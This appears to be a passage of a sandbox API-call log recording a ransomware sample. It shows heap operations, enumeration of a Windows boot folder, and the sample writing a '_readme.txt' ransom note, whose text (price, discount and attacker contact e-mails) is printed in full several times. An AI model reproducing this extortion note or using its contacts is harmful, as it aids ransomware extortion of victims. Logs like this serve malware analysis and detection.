[0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.491] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.491] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.492] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.493] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0227.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.493] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.493] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.493] PathFindFileNameW (pszPath="") returned="" [0227.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.493] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.494] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.494] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.494] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.494] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0227.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.494] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 0 [0227.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.494] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.494] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.494] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.495] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.495] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.497] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.497] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.497] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.497] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed800 | out: hHeap=0x630000) returned 1 [0227.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed800 [0227.497] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.499] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.499] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.500] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.500] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.501] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 